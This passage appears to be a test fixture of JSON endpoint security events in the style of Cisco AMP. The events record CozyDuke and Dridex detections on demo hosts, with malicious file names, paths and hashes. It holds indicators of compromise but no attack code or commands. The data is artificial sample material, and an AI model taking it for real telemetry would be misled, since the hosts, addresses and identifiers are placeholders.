Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156208098324250639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":682000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292803669262360","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"},"parent":{"process_id":3052,"disposition":"Malicious","file_name":"monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":35000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:KCX.18fv.1201","detection_id":"6156292803669262359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"amdhcp32.dll","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\ATI_Subsystem\\amdhcp32.dll","identity":{"sha256":"37ceea0922d1177a9de74f4858678acf6afd22706489fcca35a509bca9688cb7","sha1":"00f67deb6e435c68f8a39336c9effc45d395b134","md5":"6761106f816313394a653db5172dc487"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":33000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.0DC7438BE5-100.SBX.VIOC","detection_id":"6156292803669262356","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"aticaldd.dll","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\ATI_Subsystem\\aticaldd.dll","identity":{"sha256":"0dc7438be5b21a36651de0a08361b18d76f0920517a7d51f75dc234740f392ca","sha1":"42cfe068b0f476198b93393840d400424fd77f0c","md5":"d596827d48a3ff836545b3a999f2c3e3"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":27000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6156292803669262358","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":13000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6156292803669262357","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:Cozer.18fv.1201","detection_id":"6156292799374295059","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"atiumdag.dll","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\ATI_Subsystem\\atiumdag.dll","identity":{"sha256":"8853979fce0f767b495abd55b696203209e95f04aaefe16c52c1724d07972154","sha1":"883292f00e5836f99a1943a6e0164d8c6c124478","md5":"bc626c8f11ed753f33ad1c0fe848d898"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:KCX.18fv.1201","detection_id":"6156292799374295058","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":937000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.0DC7438BE5-100.SBX.VIOC","detection_id":"6156292799374295057","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":931000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:Cozer.18fv.1201","detection_id":"6156292799374295056","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":917000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295055","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295054","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":776000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295053","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":767000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295052","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":762000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295051","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":757000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295050","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":711000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"},"parent":{"process_id":3052,"disposition":"Malicious","file_name":"monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900023001000,"timestamp":1610704869,"timestamp_nanoseconds":23000000,"date":"2021-01-15T10:01:09+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704869,"start_date":"2021-01-15T10:01:09+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292782194426000,"timestamp":1610704867,"timestamp_nanoseconds":497000000,"date":"2021-01-15T10:01:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292782194425864","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156208033899741000,"timestamp":1610704866,"timestamp_nanoseconds":800000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156208033899741198","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":500000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6156292777899458567","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":82000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292773604491269","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} 